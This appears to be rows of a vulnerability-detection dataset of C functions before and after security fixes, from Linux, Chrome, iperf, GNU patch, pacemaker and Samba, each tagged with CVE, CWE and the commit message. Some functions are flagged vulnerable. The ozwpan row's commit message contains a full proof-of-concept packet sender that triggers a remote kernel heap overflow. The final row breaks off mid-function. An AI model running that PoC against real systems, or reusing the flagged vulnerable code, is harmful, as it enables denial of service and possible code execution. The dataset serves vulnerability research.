static int sg_proc_seq_show_debug(struct seq_file *s, void *v) { struct sg_proc_deviter * it = (struct sg_proc_deviter *) v; Sg_device *sdp; unsigned long iflags; if (it && (0 == it->index)) seq_printf(s, "max_active_device=%d def_reserved_size=%d\n", (int)it->max, sg_big_buff); read_lock_irqsave(&sg_index_lock, iflags); sdp = it ? sg_lookup_dev(it->index) : NULL; if (NULL == sdp) goto skip; read_lock(&sdp->sfd_lock); if (!list_empty(&sdp->sfds)) { seq_printf(s, " >>> device=%s ", sdp->disk->disk_name); if (atomic_read(&sdp->detaching)) seq_puts(s, "detaching pending close "); else if (sdp->device) { struct scsi_device *scsidp = sdp->device; seq_printf(s, "%d:%d:%d:%llu em=%d", scsidp->host->host_no, scsidp->channel, scsidp->id, scsidp->lun, scsidp->host->hostt->emulated); } seq_printf(s, " sg_tablesize=%d excl=%d open_cnt=%d\n", sdp->sg_tablesize, sdp->exclude, sdp->open_cnt); sg_proc_debug_helper(s, sdp); } read_unlock(&sdp->sfd_lock); skip: read_unlock_irqrestore(&sg_index_lock, iflags); return 0; }
static int sg_proc_seq_show_debug(struct seq_file *s, void *v) { struct sg_proc_deviter * it = (struct sg_proc_deviter *) v; Sg_device *sdp; unsigned long iflags; if (it && (0 == it->index)) seq_printf(s, "max_active_device=%d def_reserved_size=%d\n", (int)it->max, sg_big_buff); read_lock_irqsave(&sg_index_lock, iflags); sdp = it ? sg_lookup_dev(it->index) : NULL; if (NULL == sdp) goto skip; read_lock(&sdp->sfd_lock); if (!list_empty(&sdp->sfds)) { seq_printf(s, " >>> device=%s ", sdp->disk->disk_name); if (atomic_read(&sdp->detaching)) seq_puts(s, "detaching pending close "); else if (sdp->device) { struct scsi_device *scsidp = sdp->device; seq_printf(s, "%d:%d:%d:%llu em=%d", scsidp->host->host_no, scsidp->channel, scsidp->id, scsidp->lun, scsidp->host->hostt->emulated); } seq_printf(s, " sg_tablesize=%d excl=%d open_cnt=%d\n", sdp->sg_tablesize, sdp->exclude, sdp->open_cnt); sg_proc_debug_helper(s, sdp); } read_unlock(&sdp->sfd_lock); skip: read_unlock_irqrestore(&sg_index_lock, iflags); return 0; }
C
linux
0
null
null
null
https://github.com/chromium/chromium/commit/1161a49d663dd395bd639549c2dfe7324f847938
1161a49d663dd395bd639549c2dfe7324f847938
Don't populate URL data in WebDropData when dragging files. This is considered a potential security issue as well, since it leaks filesystem paths. BUG=332579 Review URL: https://codereview.chromium.org/135633002 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@244538 0039d316-1c4b-4281-b951-d872f2087c98
void OSExchangeDataProviderAura::SetPickledData( const OSExchangeData::CustomFormat& format, const Pickle& data) { pickle_data_[format] = data; formats_ |= OSExchangeData::PICKLED_DATA; }
void OSExchangeDataProviderAura::SetPickledData( const OSExchangeData::CustomFormat& format, const Pickle& data) { pickle_data_[format] = data; formats_ |= OSExchangeData::PICKLED_DATA; }
C
Chrome
0
CVE-2017-6991
https://www.cvedetails.com/cve/CVE-2017-6991/
CWE-119
https://github.com/chromium/chromium/commit/3bfe67c9c4b45eb713326aae7a67c8f7390dae08
3bfe67c9c4b45eb713326aae7a67c8f7390dae08
sqlite: safely move pointer values through SQL. This lands https://www.sqlite.org/src/timeline?c=d6a44b35 in third_party/sqlite/src/ and third_party/sqlite/patches/0013-Add-new-interfaces-sqlite3_bind_pointer-sqlite3_resu.patch and re-generates third_party/sqlite/amalgamation/* using the script at third_party/sqlite/google_generate_amalgamation.sh. The CL also adds a layout test that verifies the patch works as intended. BUG=742407 Change-Id: I2e1a457459cd2e975e6241b630e7b79c82545981 Reviewed-on: https://chromium-review.googlesource.com/572976 Reviewed-by: Chris Mumford <[email protected]> Commit-Queue: Victor Costan <[email protected]> Cr-Commit-Position: refs/heads/master@{#487275}
static const Mem *columnNullValue(void){ /* Even though the Mem structure contains an element ** of type i64, on certain architectures (x86) with certain compiler ** switches (-Os), gcc may align this Mem object on a 4-byte boundary ** instead of an 8-byte one. This all works fine, except that when ** running with SQLITE_DEBUG defined the SQLite code sometimes assert()s ** that a Mem structure is located on an 8-byte boundary. To prevent ** these assert()s from failing, when building with SQLITE_DEBUG defined ** using gcc, we force nullMem to be 8-byte aligned using the magical ** __attribute__((aligned(8))) macro. */ static const Mem nullMem #if defined(SQLITE_DEBUG) && defined(__GNUC__) __attribute__((aligned(8))) #endif = { /* .u = */ {0}, /* .flags = */ (u16)MEM_Null, /* .enc = */ (u8)0, /* .eSubtype = */ (u8)0, /* .n = */ (int)0, /* .z = */ (char*)0, /* .zMalloc = */ (char*)0, /* .szMalloc = */ (int)0, /* .uTemp = */ (u32)0, /* .db = */ (sqlite3*)0, /* .xDel = */ (void(*)(void*))0, #ifdef SQLITE_DEBUG /* .pScopyFrom = */ (Mem*)0, /* .pFiller = */ (void*)0, #endif }; return &nullMem; }
static const Mem *columnNullValue(void){ /* Even though the Mem structure contains an element ** of type i64, on certain architectures (x86) with certain compiler ** switches (-Os), gcc may align this Mem object on a 4-byte boundary ** instead of an 8-byte one. This all works fine, except that when ** running with SQLITE_DEBUG defined the SQLite code sometimes assert()s ** that a Mem structure is located on an 8-byte boundary. To prevent ** these assert()s from failing, when building with SQLITE_DEBUG defined ** using gcc, we force nullMem to be 8-byte aligned using the magical ** __attribute__((aligned(8))) macro. */ static const Mem nullMem #if defined(SQLITE_DEBUG) && defined(__GNUC__) __attribute__((aligned(8))) #endif = { /* .u = */ {0}, /* .flags = */ (u16)MEM_Null, /* .enc = */ (u8)0, /* .eSubtype = */ (u8)0, /* .n = */ (int)0, /* .z = */ (char*)0, /* .zMalloc = */ (char*)0, /* .szMalloc = */ (int)0, /* .uTemp = */ (u32)0, /* .db = */ (sqlite3*)0, /* .xDel = */ (void(*)(void*))0, #ifdef SQLITE_DEBUG /* .pScopyFrom = */ (Mem*)0, /* .pFiller = */ (void*)0, #endif }; return &nullMem; }
C
Chrome
0
CVE-2014-0131
https://www.cvedetails.com/cve/CVE-2014-0131/
CWE-416
https://github.com/torvalds/linux/commit/1fd819ecb90cc9b822cd84d3056ddba315d3340f
1fd819ecb90cc9b822cd84d3056ddba315d3340f
skbuff: skb_segment: orphan frags before copying skb_segment copies frags around, so we need to copy them carefully to avoid accessing user memory after reporting completion to userspace through a callback. skb_segment doesn't normally happen on datapath: TSO needs to be disabled - so disabling zero copy in this case does not look like a big deal. Signed-off-by: Michael S. Tsirkin <[email protected]> Acked-by: Herbert Xu <[email protected]> Signed-off-by: David S. Miller <[email protected]>
void skb_trim(struct sk_buff *skb, unsigned int len) { if (skb->len > len) __skb_trim(skb, len); }
void skb_trim(struct sk_buff *skb, unsigned int len) { if (skb->len > len) __skb_trim(skb, len); }
C
linux
0
CVE-2015-4002
https://www.cvedetails.com/cve/CVE-2015-4002/
CWE-119
https://github.com/torvalds/linux/commit/d114b9fe78c8d6fc6e70808c2092aa307c36dc8e
d114b9fe78c8d6fc6e70808c2092aa307c36dc8e
ozwpan: Use proper check to prevent heap overflow Since elt->length is a u8, we can make this variable a u8. Then we can do proper bounds checking more easily. Without this, a potentially negative value is passed to the memcpy inside oz_hcd_get_desc_cnf, resulting in a remotely exploitable heap overflow with network supplied data. This could result in remote code execution. A PoC which obtains DoS follows below. It requires the ozprotocol.h file from this module. =-=-=-=-=-= #include <arpa/inet.h> #include <linux/if_packet.h> #include <net/if.h> #include <netinet/ether.h> #include <stdio.h> #include <string.h> #include <stdlib.h> #include <endian.h> #include <sys/ioctl.h> #include <sys/socket.h> #define u8 uint8_t #define u16 uint16_t #define u32 uint32_t #define __packed __attribute__((__packed__)) #include "ozprotocol.h" static int hex2num(char c) { if (c >= '0' && c <= '9') return c - '0'; if (c >= 'a' && c <= 'f') return c - 'a' + 10; if (c >= 'A' && c <= 'F') return c - 'A' + 10; return -1; } static int hwaddr_aton(const char *txt, uint8_t *addr) { int i; for (i = 0; i < 6; i++) { int a, b; a = hex2num(*txt++); if (a < 0) return -1; b = hex2num(*txt++); if (b < 0) return -1; *addr++ = (a << 4) | b; if (i < 5 && *txt++ != ':') return -1; } return 0; } int main(int argc, char *argv[]) { if (argc < 3) { fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]); return 1; } uint8_t dest_mac[6]; if (hwaddr_aton(argv[2], dest_mac)) { fprintf(stderr, "Invalid mac address.\n"); return 1; } int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW); if (sockfd < 0) { perror("socket"); return 1; } struct ifreq if_idx; int interface_index; strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1); if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) { perror("SIOCGIFINDEX"); return 1; } interface_index = if_idx.ifr_ifindex; if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) { perror("SIOCGIFHWADDR"); return 1; } uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_elt_connect_req oz_elt_connect_req; } __packed connect_packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(0) }, .oz_elt = { .type = OZ_ELT_CONNECT_REQ, .length = sizeof(struct oz_elt_connect_req) }, .oz_elt_connect_req = { .mode = 0, .resv1 = {0}, .pd_info = 0, .session_id = 0, .presleep = 35, .ms_isoc_latency = 0, .host_vendor = 0, .keep_alive = 0, .apps = htole16((1 << OZ_APPID_USB) | 0x1), .max_len_div16 = 0, .ms_per_isoc = 0, .up_audio_buf = 0, .ms_per_elt = 0 } }; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_get_desc_rsp oz_get_desc_rsp; } __packed pwn_packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(1) }, .oz_elt = { .type = OZ_ELT_APP_DATA, .length = sizeof(struct oz_get_desc_rsp) - 2 }, .oz_get_desc_rsp = { .app_id = OZ_APPID_USB, .elt_seq_num = 0, .type = OZ_GET_DESC_RSP, .req_id = 0, .offset = htole16(0), .total_size = htole16(0), .rcode = 0, .data = {0} } }; struct sockaddr_ll socket_address = { .sll_ifindex = interface_index, .sll_halen = ETH_ALEN, .sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }; if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { perror("sendto"); return 1; } usleep(300000); if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { perror("sendto"); return 1; } return 0; } Signed-off-by: Jason A. Donenfeld <[email protected]> Acked-by: Dan Carpenter <[email protected]> Cc: stable <[email protected]> Signed-off-by: Greg Kroah-Hartman <[email protected]>
void oz_usb_rx(struct oz_pd *pd, struct oz_elt *elt) { struct oz_usb_hdr *usb_hdr = (struct oz_usb_hdr *)(elt + 1); struct oz_usb_ctx *usb_ctx; spin_lock_bh(&pd->app_lock[OZ_APPID_USB]); usb_ctx = (struct oz_usb_ctx *)pd->app_ctx[OZ_APPID_USB]; if (usb_ctx) oz_usb_get(usb_ctx); spin_unlock_bh(&pd->app_lock[OZ_APPID_USB]); if (usb_ctx == NULL) return; /* Context has gone so nothing to do. */ if (usb_ctx->stopped) goto done; /* If sequence number is non-zero then check it is not a duplicate. * Zero sequence numbers are always accepted. */ if (usb_hdr->elt_seq_num != 0) { if (((usb_ctx->rx_seq_num - usb_hdr->elt_seq_num) & 0x80) == 0) /* Reject duplicate element. */ goto done; } usb_ctx->rx_seq_num = usb_hdr->elt_seq_num; switch (usb_hdr->type) { case OZ_GET_DESC_RSP: { struct oz_get_desc_rsp *body = (struct oz_get_desc_rsp *)usb_hdr; u16 offs, total_size; u8 data_len; if (elt->length < sizeof(struct oz_get_desc_rsp) - 1) break; data_len = elt->length - (sizeof(struct oz_get_desc_rsp) - 1); offs = le16_to_cpu(get_unaligned(&body->offset)); total_size = le16_to_cpu(get_unaligned(&body->total_size)); oz_dbg(ON, "USB_REQ_GET_DESCRIPTOR - cnf\n"); oz_hcd_get_desc_cnf(usb_ctx->hport, body->req_id, body->rcode, body->data, data_len, offs, total_size); } break; case OZ_SET_CONFIG_RSP: { struct oz_set_config_rsp *body = (struct oz_set_config_rsp *)usb_hdr; oz_hcd_control_cnf(usb_ctx->hport, body->req_id, body->rcode, NULL, 0); } break; case OZ_SET_INTERFACE_RSP: { struct oz_set_interface_rsp *body = (struct oz_set_interface_rsp *)usb_hdr; oz_hcd_control_cnf(usb_ctx->hport, body->req_id, body->rcode, NULL, 0); } break; case OZ_VENDOR_CLASS_RSP: { struct oz_vendor_class_rsp *body = (struct oz_vendor_class_rsp *)usb_hdr; oz_hcd_control_cnf(usb_ctx->hport, body->req_id, body->rcode, body->data, elt->length- sizeof(struct oz_vendor_class_rsp)+1); } break; case OZ_USB_ENDPOINT_DATA: oz_usb_handle_ep_data(usb_ctx, usb_hdr, elt->length); break; } done: oz_usb_put(usb_ctx); }
void oz_usb_rx(struct oz_pd *pd, struct oz_elt *elt) { struct oz_usb_hdr *usb_hdr = (struct oz_usb_hdr *)(elt + 1); struct oz_usb_ctx *usb_ctx; spin_lock_bh(&pd->app_lock[OZ_APPID_USB]); usb_ctx = (struct oz_usb_ctx *)pd->app_ctx[OZ_APPID_USB]; if (usb_ctx) oz_usb_get(usb_ctx); spin_unlock_bh(&pd->app_lock[OZ_APPID_USB]); if (usb_ctx == NULL) return; /* Context has gone so nothing to do. */ if (usb_ctx->stopped) goto done; /* If sequence number is non-zero then check it is not a duplicate. * Zero sequence numbers are always accepted. */ if (usb_hdr->elt_seq_num != 0) { if (((usb_ctx->rx_seq_num - usb_hdr->elt_seq_num) & 0x80) == 0) /* Reject duplicate element. */ goto done; } usb_ctx->rx_seq_num = usb_hdr->elt_seq_num; switch (usb_hdr->type) { case OZ_GET_DESC_RSP: { struct oz_get_desc_rsp *body = (struct oz_get_desc_rsp *)usb_hdr; int data_len = elt->length - sizeof(struct oz_get_desc_rsp) + 1; u16 offs = le16_to_cpu(get_unaligned(&body->offset)); u16 total_size = le16_to_cpu(get_unaligned(&body->total_size)); oz_dbg(ON, "USB_REQ_GET_DESCRIPTOR - cnf\n"); oz_hcd_get_desc_cnf(usb_ctx->hport, body->req_id, body->rcode, body->data, data_len, offs, total_size); } break; case OZ_SET_CONFIG_RSP: { struct oz_set_config_rsp *body = (struct oz_set_config_rsp *)usb_hdr; oz_hcd_control_cnf(usb_ctx->hport, body->req_id, body->rcode, NULL, 0); } break; case OZ_SET_INTERFACE_RSP: { struct oz_set_interface_rsp *body = (struct oz_set_interface_rsp *)usb_hdr; oz_hcd_control_cnf(usb_ctx->hport, body->req_id, body->rcode, NULL, 0); } break; case OZ_VENDOR_CLASS_RSP: { struct oz_vendor_class_rsp *body = (struct oz_vendor_class_rsp *)usb_hdr; oz_hcd_control_cnf(usb_ctx->hport, body->req_id, body->rcode, body->data, elt->length- sizeof(struct oz_vendor_class_rsp)+1); } break; case OZ_USB_ENDPOINT_DATA: oz_usb_handle_ep_data(usb_ctx, usb_hdr, elt->length); break; } done: oz_usb_put(usb_ctx); }
C
linux
1
CVE-2016-4303
https://www.cvedetails.com/cve/CVE-2016-4303/
CWE-119
https://github.com/esnet/iperf/commit/91f2fa59e8ed80dfbf400add0164ee0e508e412a
91f2fa59e8ed80dfbf400add0164ee0e508e412a
Fix a buffer overflow / heap corruption issue that could occur if a malformed JSON string was passed on the control channel. This issue, present in the cJSON library, was already fixed upstream, so was addressed here in iperf3 by importing a newer version of cJSON (plus local ESnet modifications). Discovered and reported by Dave McDaniel, Cisco Talos. Based on a patch by @dopheide-esnet, with input from @DaveGamble. Cross-references: TALOS-CAN-0164, ESNET-SECADV-2016-0001, CVE-2016-4303 (cherry picked from commit ed94082be27d971a5e1b08b666e2c217cf470a40) Signed-off-by: Bruce A. Mah <[email protected]>
cJSON *cJSON_GetObjectItem( cJSON *object, const char *string )
cJSON *cJSON_GetObjectItem( cJSON *object, const char *string ) { cJSON *c = object->child; while ( c && cJSON_strcasecmp( c->string, string ) ) c = c->next; return c; }
C
iperf
1
CVE-2019-13638
https://www.cvedetails.com/cve/CVE-2019-13638/
CWE-78
https://git.savannah.gnu.org/cgit/patch.git/commit/?id=3fcd042d26d70856e826a42b5f93dc4854d80bf0
3fcd042d26d70856e826a42b5f93dc4854d80bf0
null
fetchmode (char const *str) { const char *s; mode_t mode; while (ISSPACE ((unsigned char) *str)) str++; for (s = str, mode = 0; s < str + 6; s++) { if (*s >= '0' && *s <= '7') mode = (mode << 3) + (*s - '0'); else { mode = 0; break; } } if (*s == '\r') s++; if (*s != '\n') mode = 0; /* NOTE: The "diff --git" format always sets the file mode permission bits of symlinks to 0. (On Linux, symlinks actually always have 0777 permissions, so this is not even consistent.) */ return mode; }
fetchmode (char const *str) { const char *s; mode_t mode; while (ISSPACE ((unsigned char) *str)) str++; for (s = str, mode = 0; s < str + 6; s++) { if (*s >= '0' && *s <= '7') mode = (mode << 3) + (*s - '0'); else { mode = 0; break; } } if (*s == '\r') s++; if (*s != '\n') mode = 0; /* NOTE: The "diff --git" format always sets the file mode permission bits of symlinks to 0. (On Linux, symlinks actually always have 0777 permissions, so this is not even consistent.) */ return mode; }
C
savannah
0
CVE-2017-6001
https://www.cvedetails.com/cve/CVE-2017-6001/
CWE-362
https://github.com/torvalds/linux/commit/321027c1fe77f892f4ea07846aeae08cefbbb290
321027c1fe77f892f4ea07846aeae08cefbbb290
perf/core: Fix concurrent sys_perf_event_open() vs. 'move_group' race Di Shen reported a race between two concurrent sys_perf_event_open() calls where both try and move the same pre-existing software group into a hardware context. The problem is exactly that described in commit: f63a8daa5812 ("perf: Fix event->ctx locking") ... where, while we wait for a ctx->mutex acquisition, the event->ctx relation can have changed under us. That very same commit failed to recognise sys_perf_event_context() as an external access vector to the events and thereby didn't apply the established locking rules correctly. So while one sys_perf_event_open() call is stuck waiting on mutex_lock_double(), the other (which owns said locks) moves the group about. So by the time the former sys_perf_event_open() acquires the locks, the context we've acquired is stale (and possibly dead). Apply the established locking rules as per perf_event_ctx_lock_nested() to the mutex_lock_double() for the 'move_group' case. This obviously means we need to validate state after we acquire the locks. Reported-by: Di Shen (Keen Lab) Tested-by: John Dias <[email protected]> Signed-off-by: Peter Zijlstra (Intel) <[email protected]> Cc: Alexander Shishkin <[email protected]> Cc: Arnaldo Carvalho de Melo <[email protected]> Cc: Arnaldo Carvalho de Melo <[email protected]> Cc: Jiri Olsa <[email protected]> Cc: Kees Cook <[email protected]> Cc: Linus Torvalds <[email protected]> Cc: Min Chong <[email protected]> Cc: Peter Zijlstra <[email protected]> Cc: Stephane Eranian <[email protected]> Cc: Thomas Gleixner <[email protected]> Cc: Vince Weaver <[email protected]> Fixes: f63a8daa5812 ("perf: Fix event->ctx locking") Link: http://lkml.kernel.org/r/[email protected] Signed-off-by: Ingo Molnar <[email protected]>
static void __perf_addr_filters_adjust(struct perf_event *event, void *data) { struct perf_addr_filters_head *ifh = perf_event_addr_filters(event); struct vm_area_struct *vma = data; unsigned long off = vma->vm_pgoff << PAGE_SHIFT, flags; struct file *file = vma->vm_file; struct perf_addr_filter *filter; unsigned int restart = 0, count = 0; if (!has_addr_filter(event)) return; if (!file) return; raw_spin_lock_irqsave(&ifh->lock, flags); list_for_each_entry(filter, &ifh->list, entry) { if (perf_addr_filter_match(filter, file, off, vma->vm_end - vma->vm_start)) { event->addr_filters_offs[count] = vma->vm_start; restart++; } count++; } if (restart) event->addr_filters_gen++; raw_spin_unlock_irqrestore(&ifh->lock, flags); if (restart) perf_event_stop(event, 1); }
static void __perf_addr_filters_adjust(struct perf_event *event, void *data) { struct perf_addr_filters_head *ifh = perf_event_addr_filters(event); struct vm_area_struct *vma = data; unsigned long off = vma->vm_pgoff << PAGE_SHIFT, flags; struct file *file = vma->vm_file; struct perf_addr_filter *filter; unsigned int restart = 0, count = 0; if (!has_addr_filter(event)) return; if (!file) return; raw_spin_lock_irqsave(&ifh->lock, flags); list_for_each_entry(filter, &ifh->list, entry) { if (perf_addr_filter_match(filter, file, off, vma->vm_end - vma->vm_start)) { event->addr_filters_offs[count] = vma->vm_start; restart++; } count++; } if (restart) event->addr_filters_gen++; raw_spin_unlock_irqrestore(&ifh->lock, flags); if (restart) perf_event_stop(event, 1); }
C
linux
0
null
null
null
https://github.com/chromium/chromium/commit/6c5d779aaf0dec9628da8a20751e95fd09554b14
6c5d779aaf0dec9628da8a20751e95fd09554b14
Move the cancellation of blocked requests code from ResourceDispatcherHost::~ResourceDispatcherHost() to ResourceDispatcherHost::OnShutdown(). This causes the requests to be cancelled on the IO thread rather than the UI thread, which is important since cancellation may delete the URLRequest (and URLRequests should not outlive the IO thread). BUG=39243 Review URL: http://codereview.chromium.org/1213004 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@42575 0039d316-1c4b-4281-b951-d872f2087c98
void ResourceDispatcherHost::OnFollowRedirect( int request_id, bool has_new_first_party_for_cookies, const GURL& new_first_party_for_cookies) { FollowDeferredRedirect(receiver_->id(), request_id, has_new_first_party_for_cookies, new_first_party_for_cookies); }
void ResourceDispatcherHost::OnFollowRedirect( int request_id, bool has_new_first_party_for_cookies, const GURL& new_first_party_for_cookies) { FollowDeferredRedirect(receiver_->id(), request_id, has_new_first_party_for_cookies, new_first_party_for_cookies); }
C
Chrome
0
CVE-2015-1867
https://www.cvedetails.com/cve/CVE-2015-1867/
CWE-264
https://github.com/ClusterLabs/pacemaker/commit/84ac07c
84ac07c
Fix: acl: Do not delay evaluation of added nodes in some situations It is not appropriate when the node has no children as it is not a placeholder
__xml_acl_mode_test(enum xml_private_flags allowed, enum xml_private_flags requested) { if(is_set(allowed, xpf_acl_deny)) { return FALSE; } else if(is_set(allowed, requested)) { return TRUE; } else if(is_set(requested, xpf_acl_read) && is_set(allowed, xpf_acl_write)) { return TRUE; } else if(is_set(requested, xpf_acl_create) && is_set(allowed, xpf_acl_write)) { return TRUE; } else if(is_set(requested, xpf_acl_create) && is_set(allowed, xpf_created)) { return TRUE; } return FALSE; }
__xml_acl_mode_test(enum xml_private_flags allowed, enum xml_private_flags requested) { if(is_set(allowed, xpf_acl_deny)) { return FALSE; } else if(is_set(allowed, requested)) { return TRUE; } else if(is_set(requested, xpf_acl_read) && is_set(allowed, xpf_acl_write)) { return TRUE; } else if(is_set(requested, xpf_acl_create) && is_set(allowed, xpf_acl_write)) { return TRUE; } else if(is_set(requested, xpf_acl_create) && is_set(allowed, xpf_created)) { return TRUE; } return FALSE; }
C
pacemaker
0
CVE-2015-5296
https://www.cvedetails.com/cve/CVE-2015-5296/
CWE-20
https://git.samba.org/?p=samba.git;a=commit;h=a819d2b440aafa3138d95ff6e8b824da885a70e9
a819d2b440aafa3138d95ff6e8b824da885a70e9
null
static NTSTATUS smb2cli_conn_dispatch_incoming(struct smbXcli_conn *conn, TALLOC_CTX *tmp_mem, uint8_t *inbuf) { struct tevent_req *req; struct smbXcli_req_state *state = NULL; struct iovec *iov; int i, num_iov; NTSTATUS status; bool defer = true; struct smbXcli_session *last_session = NULL; size_t inbuf_len = smb_len_tcp(inbuf); status = smb2cli_inbuf_parse_compound(conn, inbuf + NBT_HDR_SIZE, inbuf_len, tmp_mem, &iov, &num_iov); if (!NT_STATUS_IS_OK(status)) { return status; } for (i=0; i<num_iov; i+=4) { uint8_t *inbuf_ref = NULL; struct iovec *cur = &iov[i]; uint8_t *inhdr = (uint8_t *)cur[1].iov_base; uint16_t opcode = SVAL(inhdr, SMB2_HDR_OPCODE); uint32_t flags = IVAL(inhdr, SMB2_HDR_FLAGS); uint64_t mid = BVAL(inhdr, SMB2_HDR_MESSAGE_ID); uint16_t req_opcode; uint32_t req_flags; uint16_t credits = SVAL(inhdr, SMB2_HDR_CREDIT); uint32_t new_credits; struct smbXcli_session *session = NULL; const DATA_BLOB *signing_key = NULL; bool was_encrypted = false; new_credits = conn->smb2.cur_credits; new_credits += credits; if (new_credits > UINT16_MAX) { return NT_STATUS_INVALID_NETWORK_RESPONSE; } conn->smb2.cur_credits += credits; req = smb2cli_conn_find_pending(conn, mid); if (req == NULL) { return NT_STATUS_INVALID_NETWORK_RESPONSE; } state = tevent_req_data(req, struct smbXcli_req_state); req_opcode = SVAL(state->smb2.hdr, SMB2_HDR_OPCODE); if (opcode != req_opcode) { return NT_STATUS_INVALID_NETWORK_RESPONSE; } req_flags = SVAL(state->smb2.hdr, SMB2_HDR_FLAGS); if (!(flags & SMB2_HDR_FLAG_REDIRECT)) { return NT_STATUS_INVALID_NETWORK_RESPONSE; } status = NT_STATUS(IVAL(inhdr, SMB2_HDR_STATUS)); if ((flags & SMB2_HDR_FLAG_ASYNC) && NT_STATUS_EQUAL(status, STATUS_PENDING)) { uint64_t async_id = BVAL(inhdr, SMB2_HDR_ASYNC_ID); if (state->smb2.got_async) { /* We only expect one STATUS_PENDING response */ return NT_STATUS_INVALID_NETWORK_RESPONSE; } state->smb2.got_async = true; /* * async interim responses are not signed, * even if the SMB2_HDR_FLAG_SIGNED flag * is set. */ state->smb2.cancel_flags = SMB2_HDR_FLAG_ASYNC; state->smb2.cancel_mid = 0; state->smb2.cancel_aid = async_id; if (state->smb2.notify_async) { tevent_req_defer_callback(req, state->ev); tevent_req_notify_callback(req); } continue; } session = state->session; if (req_flags & SMB2_HDR_FLAG_CHAINED) { session = last_session; } last_session = session; if (state->smb2.should_sign) { if (!(flags & SMB2_HDR_FLAG_SIGNED)) { return NT_STATUS_ACCESS_DENIED; } } if (flags & SMB2_HDR_FLAG_SIGNED) { uint64_t uid = BVAL(inhdr, SMB2_HDR_SESSION_ID); if (session == NULL) { struct smbXcli_session *s; s = state->conn->sessions; for (; s; s = s->next) { if (s->smb2->session_id != uid) { continue; } session = s; break; } } if (session == NULL) { return NT_STATUS_INVALID_NETWORK_RESPONSE; } last_session = session; signing_key = &session->smb2_channel.signing_key; } if (opcode == SMB2_OP_SESSSETUP) { /* * We prefer the channel signing key, if it is * already there. * * If we do not have a channel signing key yet, * we try the main signing key, if it is not * the final response. */ if (signing_key && signing_key->length == 0 && !NT_STATUS_IS_OK(status)) { signing_key = &session->smb2->signing_key; } if (signing_key && signing_key->length == 0) { /* * If we do not have a session key to * verify the signature, we defer the * signing check to the caller. * * The caller gets NT_STATUS_OK, it * has to call * smb2cli_session_set_session_key() * or * smb2cli_session_set_channel_key() * which will check the signature * with the channel signing key. */ signing_key = NULL; } } if (cur[0].iov_len == SMB2_TF_HDR_SIZE) { const uint8_t *tf = (const uint8_t *)cur[0].iov_base; uint64_t uid = BVAL(tf, SMB2_TF_SESSION_ID); /* * If the response was encrypted in a SMB2_TRANSFORM * pdu, which belongs to the correct session, * we do not need to do signing checks * * It could be the session the response belongs to * or the session that was used to encrypt the * SMB2_TRANSFORM request. */ if ((session && session->smb2->session_id == uid) || (state->smb2.encryption_session_id == uid)) { signing_key = NULL; was_encrypted = true; } } if (NT_STATUS_EQUAL(status, NT_STATUS_USER_SESSION_DELETED)) { /* * if the server returns NT_STATUS_USER_SESSION_DELETED * the response is not signed and we should * propagate the NT_STATUS_USER_SESSION_DELETED * status to the caller. */ state->smb2.signing_skipped = true; signing_key = NULL; } if (NT_STATUS_EQUAL(status, NT_STATUS_INVALID_PARAMETER)) { /* * if the server returns * NT_STATUS_INVALID_PARAMETER * the response might not be encrypted. */ if (state->smb2.should_encrypt && !was_encrypted) { state->smb2.signing_skipped = true; signing_key = NULL; } } if (state->smb2.should_encrypt && !was_encrypted) { if (!state->smb2.signing_skipped) { return NT_STATUS_ACCESS_DENIED; } } if (NT_STATUS_EQUAL(status, NT_STATUS_NETWORK_NAME_DELETED) || NT_STATUS_EQUAL(status, NT_STATUS_FILE_CLOSED) || NT_STATUS_EQUAL(status, NT_STATUS_INVALID_PARAMETER)) { /* * if the server returns * NT_STATUS_NETWORK_NAME_DELETED * NT_STATUS_FILE_CLOSED * NT_STATUS_INVALID_PARAMETER * the response might not be signed * as this happens before the signing checks. * * If server echos the signature (or all zeros) * we should report the status from the server * to the caller. */ if (signing_key) { int cmp; cmp = memcmp(inhdr+SMB2_HDR_SIGNATURE, state->smb2.hdr+SMB2_HDR_SIGNATURE, 16); if (cmp == 0) { state->smb2.signing_skipped = true; signing_key = NULL; } } if (signing_key) { int cmp; static const uint8_t zeros[16]; cmp = memcmp(inhdr+SMB2_HDR_SIGNATURE, zeros, 16); if (cmp == 0) { state->smb2.signing_skipped = true; signing_key = NULL; } } } if (signing_key) { status = smb2_signing_check_pdu(*signing_key, state->conn->protocol, &cur[1], 3); if (!NT_STATUS_IS_OK(status)) { /* * If the signing check fails, we disconnect * the connection. */ return status; } } if (NT_STATUS_EQUAL(status, NT_STATUS_NETWORK_SESSION_EXPIRED) && (session != NULL) && session->disconnect_expired) { /* * this should be a short term hack * until the upper layers have implemented * re-authentication. */ return status; } smbXcli_req_unset_pending(req); 